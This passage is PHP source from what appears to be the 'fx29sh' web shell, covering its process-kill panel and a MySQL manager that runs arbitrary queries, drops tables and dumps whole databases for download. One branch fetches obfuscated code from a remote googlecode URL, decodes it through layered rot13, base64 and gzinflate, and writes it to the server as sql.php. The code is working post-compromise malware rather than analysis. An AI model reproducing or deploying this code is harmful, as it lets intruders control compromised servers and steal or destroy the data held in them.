3310 $line[0]="".$line[0]."";
3311 }
3312 $line[]="<div align='center'><a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\">KILL</a></div>";
3313 $prcs[]=$line;
3314 }
3315 }
3316 }
3317 else {
3318 if(@$pid) {
3319 echo "<br/><center>[Kill] : <span class='gaya'>Killing PID ".$pid."... ";
3320 echo fx29exec("taskkill /PID $pid /F");
3321 echo "</span></center>";
3322 }
3323 while(ereg(" ",$ret)) {
3324 $ret=str_replace(" "," ",$ret);
3325 }
3326 while(ereg("=",$ret)) {
3327 $ret=str_replace("=","",$ret);
3328 }
3329 $ret=convert_cyr_string($ret,"d","w");
3330 $stack=explode("\n",$ret);
3331 unset($stack[0],$stack[2]);
3332 $stack=array_values($stack);
3333 $stack[0]=str_replace("Image Name","Image-Name",$stack[0]);
3334 $stack[0]=str_replace("Session Name","Session-Name",$stack[0]);
3335 $stack[0]=str_replace("Mem Usage","Memory-Usage",$stack[0]);
3336 $stack[0].=" KILL";
3337 $head=explode(" ",$stack[0]);
3338 $stack=array_slice($stack,1);
3339 $head=array_values($head);
3340 if($parsesort[1]!="a") {
3341 $y=" <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/ascen.gif\" alt=\"Asc\"></a>";
3342 }
3343 else {
3344 $y=" <a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"http://syntax-errorz.googlecode.com/svn/trunk/descen.gif\" alt=\"Dsc\"></a>";
3345 }
3346 if($k>count($head)) {
3347 $k=count($head)-1;
3348 }
3349 for($i=0;$i<count($head);$i++) {
3350 if($i!=$k) {
3351 $head[$i]="<div class='hp'><a href=\"".$surl."x=processes&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b class='gaya'>".trim($head[$i])."</b></a></div>";
3352 }
3353 }
3354 $prcs=array();
3355 unset($stack[0]);
3356 foreach($stack as $line) {
3357 if(!empty($line)) {
3358 $line=explode(" ",$line);
3359 $line[4]=str_replace(".","",$line[4]);
3360 $line[4]=intval($line[4])*1024;
3361 unset($line[5]);
3362 $line[]="<div align='center'><a href=\"".$surl."x=processes&d=".urlencode($d)."&pid=".$line[1]."\">KILL</a></div>";
3363 $prcs[]=$line;
3364 }
3365 }
3366 }
3367 $head[$k]="<div class='hp'><b class='gaya'>".$head[$k].$y."</b></div>";
3368 $v=$processes_sort[0];
3369 usort($prcs,"tabsort");
3370 if($processes_sort[1]=="d") {
3371 $prcs=array_reverse($prcs);
3372 }
3373 $tab=array();
3374 $tab[]=$head;
3375 $tab=array_merge($tab,$prcs);
3376 echo "<br/><center><div class='sym'><table border='1' bordercolor='#333333' width='100%' cellpadding='1' cellspacing='0'>\n";
3377 foreach($tab as $i=>$k) {
3378 echo "\t<tr>";
3379 foreach($k as $j=>$v) {
3380 if(is_windows()and$i>0and$j==4) {
3381 $v=view_size($v);
3382 }
3383 echo "<td>".$v."</td>";
3384 }
3385 echo "</tr>\n";
3386 }
3387 echo "</table></center></div>\n";
3388 }
3389 }
3390}
3391elseif(isset($_GET['x'])&&($_GET['x']=='sql')) {
3392 echo "<center style='-webkit-margin-before:30px;'>";
3393 function strips(&$arr,$k="") {
3394 if(is_array($arr)) {
3395 foreach($arr as $k=>$v) {
3396 if(strtoupper($k)!="GLOBALS") {
3397 strips($arr["$k"]);
3398 }
3399 }
3400 }
3401 else {
3402 $arr=stripslashes($arr);
3403 }
3404 }
3405 function mysql_dump($set) {
3406 $sock=$set["sock"];
3407 $db=$set["db"];
3408 $print=$set["print"];
3409 $nl2br=$set["nl2br"];
3410 $file=$set["file"];
3411 $add_drop=$set["add_drop"];
3412 $tabs=$set["tabs"];
3413 $onlytabs=$set["onlytabs"];
3414 $ret=array();
3415 $ret["err"]=array();
3416 if(!is_resource($sock)) {
3417 echo("Error: \$sock is not valid resource.");
3418 }
3419 if(empty($db)) {
3420 $db="db";
3421 }
3422 if(empty($print)) {
3423 $print=0;
3424 }
3425 if(empty($nl2br)) {
3426 $nl2br=0;
3427 }
3428 if(empty($add_drop)) {
3429 $add_drop=TRUE;
3430 }
3431 if(empty($file)) {
3432 $file=$tmp_dir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
3433 }
3434 if(!is_array($tabs)) {
3435 $tabs=array();
3436 }
3437 if(empty($add_drop)) {
3438 $add_drop=TRUE;
3439 }
3440 if(sizeof($tabs)==0) {
3441 $res=mysql_query("SHOW TABLES FROM ".$db,$sock);
3442 if(mysql_num_rows($res)>0) {
3443 while($row=mysql_fetch_row($res)) {
3444 $tabs[]=$row[0];
3445 }
3446 }
3447 }
3448 $out="
3449# Dumped By S4MP4H
3450# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
3451# Date: ".date("d.m.Y H:i:s")."
3452# DB: \"".$db."\"
3453#---------------------------------------------------------------------------------\n";
3454 $c=count($onlytabs);
3455 foreach($tabs as $tab) {
3456 if((in_array($tab,$onlytabs))or(!$c)) {
3457 if($add_drop) {
3458 $out.="DROP TABLE IF EXISTS `".$tab."`;\n";
3459 }
3460 $res=mysql_query("SHOW CREATE TABLE `".$tab."`",$sock);
3461 if(!$res) {
3462 $ret["err"][]=mysql_smarterror();
3463 }
3464 else {
3465 $row=mysql_fetch_row($res);
3466 $out.=$row["1"].";\n\n";
3467 $res=mysql_query("SELECT * FROM `$tab`",$sock);
3468 if(mysql_num_rows($res)>0) {
3469 while($row=mysql_fetch_assoc($res)) {
3470 $keys=implode("`, `",array_keys($row));
3471 $values=array_values($row);
3472 foreach($values as $k=>$v) {
3473 $values[$k]=addslashes($v);
3474 }
3475 $values=implode("', '",$values);
3476 $sql="INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
3477 $out.=$sql;
3478 }
3479 }
3480 }
3481 }
3482 }
3483 $out.="#---------------------------------------------------------------------------------\n";
3484 if($file) {
3485 $fp=fopen($file,"w");
3486 if(!$fp) {
3487 $ret["err"][]=2;
3488 }
3489 else {
3490 fwrite($fp,$out);
3491 fclose($fp);
3492 }
3493 }
3494 if($print) {
3495 if($nl2br) {
3496 echo nl2br($out);
3497 }
3498 else {
3499 echo $out;
3500 }
3501 }
3502 return $out;
3503 }
3504 function mysql_buildwhere($array,$sep=" and",$functs=array()) {
3505 if(!is_array($array)) {
3506 $array=array();
3507 }
3508 $result="";
3509 foreach($array as $k=>$v) {
3510 $value="";
3511 if(!empty($functs[$k])) {
3512 $value.=$functs[$k]."(";
3513 }
3514 $value.="'".addslashes($v)."'";
3515 if(!empty($functs[$k])) {
3516 $value.=")";
3517 }
3518 $result.="`".$k."` = ".$value.$sep;
3519 }
3520 $result=substr($result,0,strlen($result)-strlen($sep));
3521 return $result;
3522 }
3523 function mysql_fetch_all($query,$sock) {
3524 if($sock) {
3525 $result=mysql_query($query,$sock);
3526 }
3527 else {
3528 $result=mysql_query($query);
3529 }
3530 $array=array();
3531 while($row=mysql_fetch_array($result)) {
3532 $array[]=$row;
3533 }
3534 mysql_free_result($result);
3535 return $array;
3536 }
3537 function mysql_smarterror($sock) {
3538 if($sock) {
3539 $error=mysql_error($sock);
3540 }
3541 else {
3542 $error=mysql_error();
3543 }
3544 $error=htmlspecialchars($error);
3545 return $error;
3546 }
3547 function mysql_query_form() {
3548 global $submit,$sql_x,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
3549 if(($submit)and(!$sql_query_result)and($sql_confirm)) {
3550 if(!$sql_query_error) {
3551 $sql_query_error="Query was empty";
3552 }
3553 echo "<b>Error:</b> <br/>".$sql_query_error."<br/>";
3554 }
3555 if($sql_query_resultor(!$sql_confirm)) {
3556 $sql_x=$sql_goto;
3557 }
3558 if((!$submit)or($sql_x)) {
3559 echo "<table><tr><td><form name=\"fx29sh_sqlquery\" method=POST><b>";
3560 if(($sql_query)and(!$submit)) {
3561 echo "Do you really want to";
3562 }
3563 else {
3564 echo "SQL-Query";
3565 }
3566 echo ":</b><br/><br/><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br/><br/><input type=hidden name=x value=sql><input type=hidden name=sql_x value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\" class=\"inputzbut\"> <input type=submit value=\"No\" class=\"inputzbut\"></form></td>";
3567 if($tbl_struct) {
3568 echo "<td valign=\"top\"><b>Fields:</b><br/>";
3569 foreach($tbl_struct as $field) {
3570 $name=$field["Field"];
3571 echo "+ <a href=\"#\" onclick=\"document.fx29sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br/>";
3572 }
3573 echo "</td></tr></table>";
3574 }
3575 }
3576 if($sql_query_resultor(!$sql_confirm)) {
3577 $sql_query=$sql_last_query;
3578 }
3579 }
3580 function mysql_create_db($db,$sock="") {
3581 $sql="CREATE DATABASE `".addslashes($db)."`;";
3582 if($sock) {
3583 return mysql_query($sql,$sock);
3584 }
3585 else {
3586 return mysql_query($sql);
3587 }
3588 }
3589 function mysql_query_parse($query) {
3590 $query=trim($query);
3591 $arr=explode(" ",$query);
3592 $types=array("SELECT"=>array(3,1),"SHOW"=>array(2,1),"DELETE"=>array(1),"DROP"=>array(1));
3593 $result=array();
3594 $op=strtoupper($arr[0]);
3595 if(is_array($types[$op])) {
3596 $result["propertions"]=$types[$op];
3597 $result["query"]=$query;
3598 if($types[$op]==2) {
3599 foreach($arr as $k=>$v) {
3600 if(strtoupper($v)=="LIMIT") {
3601 $result["limit"]=$arr[$k+1];
3602 $result["limit"]=explode(",",$result["limit"]);
3603 if(count($result["limit"])==1) {
3604 $result["limit"]=array(0,$result["limit"][0]);
3605 }
3606 unset($arr[$k],$arr[$k+1]);
3607 }
3608 }
3609 }
3610 }
3611 else {
3612 return FALSE;
3613 }
3614 }
3615 function disp_error($msg) {
3616 echo "<div class=errmsg>$msg</div>\n";
3617 }
3618 function html_style() {
3619 $style='
3620<center>
3621';
3622 return $style;
3623 }
3624 $auto_surl=TRUE;
3625 @set_magic_quotes_runtime(0);
3626 if(get_magic_quotes_gpc()) {
3627 strips($GLOBALS);
3628 }
3629 foreach($_REQUEST as $k=>$v) {
3630 if(!isset($$k)) {
3631 $$k=$v;
3632 }
3633 }
3634 if($auto_surl) {
3635 $include="&";
3636 foreach(explode("&",getenv("QUERY_STRING")) as $v) {
3637 $v=explode("=",$v);
3638 $name=urldecode($v[0]);
3639 $value=@urldecode($v[1]);
3640 $needles=array("http://","https://","ssl://","ftp://","\\\\");
3641 foreach($needles as $needle) {
3642 if(strpos($value,$needle)===0) {
3643 $includestr.=urlencode($name)."=".urlencode($value)."&";
3644 }
3645 }
3646 }
3647 }
3648 if(empty($surl)) {
3649 $surl=htmlspecialchars("?".@$includestr);
3650 }
3651 if(!isset($x)) {
3652 $x="sql";
3653 }
3654 if($x=="sql") {
3655 foreach(array("sort","sql_sort") as $v) {
3656 if(!empty($_GET[$v])) {
3657 $$v=$_GET[$v];
3658 }
3659 if(!empty($_POST[$v])) {
3660 $$v=$_POST[$v];
3661 }
3662 }
3663 if($sort_save) {
3664 if(!empty($sort)) {
3665 setcookie("sort",$sort);
3666 }
3667 if(!empty($sql_sort)) {
3668 setcookie("sql_sort",$sql_sort);
3669 }
3670 }
3671 if(!isset($sort)) {
3672 $sort=$sort_default;
3673 }
3674 $sort=htmlspecialchars($sort);
3675 $sort[1]=strtolower($sort[1]);
3676 echo html_style();
3677 echo "<div id='maininfo'>";
3678 if($x=="sql") {
3679 $sql_surl=$surl."x=sql";
3680 if(!isset($sql_login)) {
3681 $sql_login="";
3682 }
3683 if(!isset($sql_passwd)) {
3684 $sql_passwd="";
3685 }
3686 if(!isset($sql_server)) {
3687 $sql_server="";
3688 }
3689 if(!isset($sql_port)) {
3690 $sql_port="";
3691 }
3692 if(!isset($sql_tbl)) {
3693 $sql_tbl="";
3694 }
3695 if(!isset($sql_x)) {
3696 $sql_x="";
3697 }
3698 if(!isset($sql_tbl_x)) {
3699 $sql_tbl_x="";
3700 }
3701 if(!isset($sql_order)) {
3702 $sql_order="";
3703 }
3704 if(!isset($sql_x)) {
3705 $sql_x="";
3706 }
3707 if(!isset($sql_getfile)) {
3708 $sql_getfile="";
3709 }
3710 if(@$sql_login) {
3711 $sql_surl.="&sql_login=".htmlspecialchars($sql_login);
3712 }
3713 if(@$sql_passwd) {
3714 $sql_surl.="&sql_passwd=".htmlspecialchars($sql_passwd);
3715 }
3716 if(@$sql_server) {
3717 $sql_surl.="&sql_server=".htmlspecialchars($sql_server);
3718 }
3719 if(@$sql_port) {
3720 $sql_surl.="&sql_port=".htmlspecialchars($sql_port);
3721 }
3722 if(@$sql_db) {
3723 $sql_surl.="&sql_db=".htmlspecialchars($sql_db);
3724 }
3725 $sql_surl.="&";
3726 echo "";
3727 if(@$sql_server) {
3728 $sql_sock=@mysql_connect($sql_server.":".$sql_port,$sql_login,$sql_passwd);
3729 $err=mysql_smarterror($sql_sock);
3730 @mysql_select_db($sql_db,$sql_sock);
3731 if(@$sql_queryand$submit) {
3732 $sql_query_result=mysql_query($sql_query,$sql_sock);
3733 $sql_query_error=mysql_smarterror($sql_sock);
3734 }
3735 }
3736 else {
3737 $sql_sock=FALSE;
3738 }
3739 if(!$sql_sock) {
3740 if(!@$sql_server) {
3741 if($_GET['ins']=="sql") {
3742 $sqlshell=file_get_contents('http://syntax-errorz.googlecode.com/svn/trunk/sql.php');
3743 $file=fopen("sql.php","w+");
3744 $write=fwrite($file,gzinflate(base64_decode(str_rot13(strrev($sqlshell)))));
3745 fclose($file);
3746 chmod("sql.php",0644);
3747 echo "[Mysql] : Install Done, <a href='".$alamat."/sql.php' target='_blank'>sql.php</a>";
3748 }
3749 else {
3750 echo "[Mysql] : No Connection, <a href='".$surl."x=sql&ins=sql'>Bypass</a>";
3751 }
3752 }
3753 else {
3754 disp_error("ERROR: ".$err);
3755 }
3756 }
3757 else {
3758 $sqlquicklaunch=array();
3759 $sqlquicklaunch[]=array("Index",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
3760 $sqlquicklaunch[]=array("Query",$sql_surl."sql_x=query&sql_tbl=".urlencode($sql_tbl));
3761 $sqlquicklaunch[]=array("Server status",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=serverstatus");
3762 $sqlquicklaunch[]=array("Server variables",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=servervars");
3763 $sqlquicklaunch[]=array("Processes",$surl."x=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_x=processes");
3764 $sqlquicklaunch[]=array("Logout",$surl."x=sql");
3765 echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info().") Server: ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")<br/>";
3766 if(count($sqlquicklaunch)>0) {
3767 foreach($sqlquicklaunch as $item) {
3768 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
3769 }
3770 }
3771 }
3772 echo "</div>";
3773 echo "<table class='tab'><tr>";
3774 if(!$sql_sock) {
3775 echo '<td>
3776<form name="f_sql" action="'.$surl.'x=sql" method="POST">
3777<input type="hidden" name="x" value="sql">
3778<table class="tabnet" style="padding:1px;">
3779<tr><th colspan="2">Mysql Manager</th></tr>
3780<tr><td>Username</td><td><input type="text" name="sql_login" value="" style="width:250px;" class="inputz"></td></tr>
3781<tr><td>Password</td><td><input type="password" name="sql_passwd" value="" style="width:250px;" class="inputz"></td></tr>
3782<tr><td>Database</td><td><input type="text" name="sql_db" value="" style="width:250px;" class="inputz"></td></tr>
3783<tr><td>Host</td><td><input type="text" name="sql_server" value="localhost" class="inputz"></td></tr>
3784<tr><td>Port</td><td><input type="text" name="sql_port" value="3306" size="3" class="inputz"></td></tr>
3785<tr><th colspan="5"><input type="submit" value="Connect" class="inputzbut"></th></tr>
3786</table>
3787</form>';
3788 }
3789 else {
3790 echo '<td valign="top" style="border:1px solid #333333;">
3791<center>
3792<a href="'.$sql_surl.'"><b class="gaya">HOME</b></a>
3793<hr size="1" noshade>';
3794 $result=mysql_list_dbs($sql_sock);
3795 if(!$result) {
3796 echo mysql_smarterror();
3797 }
3798 else {
3799 echo '<form action="'.$surl.'x=sql">
3800<input type="hidden" name="x" value="sql">
3801<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
3802<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
3803<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
3804<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
3805<select name="sql_db" onchange="this.form.submit()" style="width:100%;" class="inputz">';
3806 $c=0;
3807 $dbs="";
3808 while($row=mysql_fetch_row($result)) {
3809 $dbs.="\t\t<option value=\"".$row[0]."\"";
3810 if(@$sql_db==$row[0]) {
3811 $dbs.=" selected";
3812 }
3813 $dbs.=">".$row[0]."</option>\n";
3814 $c++;
3815 }
3816 echo "\t\t<option value=\"\">Databases (".$c.")</option>\n";
3817 echo $dbs;
3818 }
3819 echo '</select>
3820<hr size="1" noshade>
3821</form>
3822</center>';
3823 if(isset($sql_db)) {
3824 $result=mysql_list_tables($sql_db);
3825 if(!$result) {
3826 $result=mysql_list_dbs($sql_sock);
3827 $num=mysql_num_rows($result);
3828 for($i=0;$i<$num;$i++) {
3829 $dbname=mysql_dbname($result,$i);
3830 echo "<table class='tab'><td style='background:#3F3F3F;border:1px solid #202020;border-top: 1px solid #505050;border-left: 1px solid #505050;'><b>+ <a href=\"".$sql_surl."sql_db=".$dbname."\" class=\"gaya\">$dbname</a></b></td></table>";
3831 }
3832 }
3833 else {
3834 echo "\t<table class='tub'><th><a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a></th></table><br/>\n";
3835 $c=0;
3836 while($row=mysql_fetch_array($result)) {
3837 $count=mysql_query("SELECT COUNT(*) FROM ".$row[0]);
3838 $count_row=mysql_fetch_array($count);
3839 echo "\t<b>+ <a class='gaya' href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\">".htmlspecialchars($row[0])."</a></b> (".$count_row[0].")</br></b>\n";
3840 mysql_free_result($count);
3841 $c++;
3842 }
3843 if(!$c) {
3844 echo "No tables found in database";
3845 }
3846 }
3847 }
3848 echo '</td>';
3849 echo '<td style="border:1px solid #333333;" valign="top">';
3850 $diplay=TRUE;
3851 if(@$sql_db) {
3852 if(!is_numeric($c)) {
3853 $c=0;
3854 }
3855 if($c==0) {
3856 $c="no";
3857 }
3858 echo "\t<center><b>There are ".$c." table(s) in database: ".htmlspecialchars($sql_db)."";
3859 if(count(@$dbquicklaunch)>0) {
3860 foreach($dbsqlquicklaunch as $item) {
3861 echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";
3862 }
3863 }
3864 echo "</b></center>\n";
3865 $xs=array("","dump");
3866 if($sql_x=="tbldrop") {
3867 $sql_query="DROP TABLE";
3868 foreach($boxtbl as $v) {
3869 $sql_query.="\n`".$v."` ,";
3870 }
3871 $sql_query=substr($sql_query,0,-1).";";
3872 $sql_x="query";
3873 }
3874 elseif($sql_x=="tblempty") {
3875 $sql_query="";
3876 foreach($boxtbl as $v) {
3877 $sql_query.="DELETE FROM `".$v."` \n";
3878 }
3879 $sql_x="query";
3880 }
3881 elseif($sql_x=="tbldump") {
3882 if(count($boxtbl)>0) {
3883 $dmptbls=$boxtbl;
3884 }
3885 elseif($thistbl) {
3886 $dmptbls=array($sql_tbl);
3887 }
3888 $sql_x="dump";
3889 }
3890 elseif($sql_x=="tblcheck") {
3891 $sql_query="CHECK TABLE";
3892 foreach($boxtbl as $v) {
3893 $sql_query.="\n`".$v."` ,";
3894 }
3895 $sql_query=substr($sql_query,0,-1).";";
3896 $sql_x="query";
3897 }
3898 elseif($sql_x=="tbloptimize") {
3899 $sql_query="OPTIMIZE TABLE";
3900 foreach($boxtbl as $v) {
3901 $sql_query.="\n`".$v."` ,";
3902 }
3903 $sql_query=substr($sql_query,0,-1).";";
3904 $sql_x="query";
3905 }
3906 elseif($sql_x=="tblrepair") {
3907 $sql_query="REPAIR TABLE";
3908 foreach($boxtbl as $v) {
3909 $sql_query.="\n`".$v."` ,";
3910 }
3911 $sql_query=substr($sql_query,0,-1).";";
3912 $sql_x="query";
3913 }
3914 elseif($sql_x=="tblanalyze") {
3915 $sql_query="ANALYZE TABLE";
3916 foreach($boxtbl as $v) {
3917 $sql_query.="\n`".$v."` ,";
3918 }
3919 $sql_query=substr($sql_query,0,-1).";";
3920 $sql_x="query";
3921 }
3922 elseif($sql_x=="deleterow") {
3923 $sql_query="";
3924 if(!empty($boxrow_all)) {
3925 $sql_query="DELETE * FROM `".$sql_tbl."`;";
3926 }
3927 else {
3928 foreach($boxrow as $v) {
3929 $sql_query.="DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";
3930 }
3931 $sql_query=substr($sql_query,0,-1);
3932 }
3933 $sql_x="query";
3934 }
3935 elseif($sql_tbl_x=="insert") {
3936 if($sql_tbl_insert_radio==1) {
3937 $keys="";
3938 $akeys=array_keys($sql_tbl_insert);
3939 foreach($akeys as $v) {
3940 $keys.="`".addslashes($v)."`, ";
3941 }
3942 if(!empty($keys)) {
3943 $keys=substr($keys,0,strlen($keys)-2);
3944 }
3945 $values="";
3946 $i=0;
3947 foreach(array_values($sql_tbl_insert) as $v) {
3948 if($funct=$sql_tbl_insert_functs[$akeys[$i]]) {
3949 $values.=$funct." (";
3950 }
3951 $values.="'".addslashes($v)."'";
3952 if($funct) {
3953 $values.=")";
3954 }
3955 $values.=", ";
3956 $i++;
3957 }
3958 if(!empty($values)) {
3959 $values=substr($values,0,strlen($values)-2);
3960 }
3961 $sql_query="INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
3962 $sql_x="query";
3963 $sql_tbl_x="browse";
3964 }
3965 elseif($sql_tbl_insert_radio==2) {
3966 $set=mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
3967 $sql_query="UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
3968 $result=mysql_query($sql_query)orprint(mysql_smarterror());
3969 $result=mysql_fetch_array($result,MYSQL_ASSOC);
3970 $sql_x="query";
3971 $sql_tbl_x="browse";
3972 }
3973 }
3974 if($sql_x=="query") {
3975 echo "<hr size=\"1\" noshade>";
3976 if(($submit)and(!$sql_query_result)and($sql_confirm)) {
3977 if(!$sql_query_error) {
3978 $sql_query_error="Query was empty";
3979 }
3980 echo "<b>Error:</b> <br/>".$sql_query_error."<br/>";
3981 }
3982 if($sql_query_resultor(!$sql_confirm)) {
3983 $sql_x=$sql_goto;
3984 }
3985 if((!$submit)or($sql_x)) {
3986 echo "<table class='tab'><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>";
3987 if(($sql_query)and(!$submit)) {
3988 echo "Do you really want to:";
3989 }
3990 else {
3991 echo "SQL-Query :";
3992 }
3993 echo "</b><br/><br/><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br/><br/><input type=\"hidden\" name=\"sql_x\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\" class=\"inputzbut\"> <input type=\"submit\" value=\"No\" class=\"inputzbut\"></form></td></tr></table>";
3994 }
3995 }
3996 if(in_array($sql_x,$xs)) {
3997 echo '<table class="tab">
3998<tr>
3999<td style="border:1px solid #333333;padding:3px;">
4000<b>Create new table:</b>
4001<form action="'.$surl.'">
4002<input type="hidden" name="x" value="sql">
4003<input type="hidden" name="sql_x" value="newtbl">
4004<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
4005<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
4006<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
4007<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
4008<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
4009<input type="text" name="sql_newtbl" size="20" class="inputz">
4010Fields: <input type="text" name="sql_field" size="3" class="inputz">
4011<input type="submit" value="Create" class="inputzbut">
4012</form>
4013</td>
4014<td style="border:1px solid #333333;padding:3px;"><b>Dump DB:</b>
4015<form action="'.$surl.'">
4016<input type="hidden" name="x" value="sql">
4017<input type="hidden" name="sql_x" value="dump">
4018<input type="hidden" name="sql_db" value="'.htmlspecialchars($sql_db).'">
4019<input type="hidden" name="sql_login" value="'.htmlspecialchars($sql_login).'">
4020<input type="hidden" name="sql_passwd" value="'.htmlspecialchars($sql_passwd).'">
4021<input type="hidden" name="sql_server" value="'.htmlspecialchars($sql_server).'">
4022<input type="hidden" name="sql_port" value="'.htmlspecialchars($sql_port).'">
4023<input type="text" name="dump_file" size="30" value="dump_'.getenv("SERVER_NAME").'_'.$sql_db.'_'.date("d-m-Y-H-i-s").'.sql" class="inputz">
4024<input type="submit" name="submit" value="Dump" class="inputzbut">
4025</form>
4026</td>
4027</tr>
4028</table>';
4029 if(!empty($sql_x)) {
4030 echo "<hr size=\"1\" noshade>";
4031 }
4032 if($sql_x=="newtbl") {
4033 echo "<b>";
4034 if((mysql_create_db($sql_newdb))and(!empty($sql_newdb))) {
4035 echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br/>";
4036 }
4037 else {
4038 echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br/>Reason:</b> ".mysql_smarterror();
4039 }
4040 }
4041 elseif($sql_x=="dump") {
4042 if(empty($submit)) {
4043 $diplay=FALSE;
4044 echo "<form method=\"GET\"><input type=\"hidden\" name=\"x\" value=\"sql\"><input type=\"hidden\" name=\"sql_x\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br/><br/>";
4045 echo "<b>DB:</b> <input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\" class=\"inputz\"><br/><br/>";
4046 $v=join(";",$dmptbls);
4047 echo "<b>Only tables (explode \";\") :</b> <input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\" class=\"inputz\"><br/><br/>";
4048 if($dump_file) {
4049 $tmp=$dump_file;
4050 }
4051 else {
4052 $tmp=htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");
4053 }
4054 echo "<b>File:</b> <input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp)%30)."\" class=\"inputz\"><br/><br/>";
4055 echo "<b>Download: </b> <input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br/><br/>";
4056 echo "<b>Save to file: </b> <input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
4057 echo "<br/><br/><input type=\"submit\" name=\"submit\" value=\"Dump\" class=\"inputzbut\">";
4058 echo "</form>";
4059 }
4060 else {
4061 $diplay=TRUE;
4062 $set=array();
4063 $set["sock"]=$sql_sock;
4064 $set["db"]=$sql_db;
4065 $dump_out="download";
4066 $set["print"]=0;
4067 $set["nl2br"]=0;
4068 $set[""]=0;
4069 $set["file"]=$dump_file;
4070 $set["add_drop"]=TRUE;
4071 $set["onlytabs"]=array();
4072 if(!empty($dmptbls)) {
4073 $set["onlytabs"]=explode(";",$dmptbls);
4074 }
4075 $ret=mysql_dump($set);
4076 if($sql_dump_download) {
4077 @ob_clean();
4078 header("Content-type: application/octet-stream");
4079 header("Content-length: ".strlen($ret));
4080 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
4081 echo '<table class="tabnet" style="padding:2px;margin:2px;"><tr><td>'.$ret.'</td></tr></table>';
4082 exit;
4083 }
4084 elseif($sql_dump_savetofile) {
4085 $fp=fopen($sql_dump_file,"w");
4086 if(!$fp) {
4087 echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";
4088 }
4089 else {
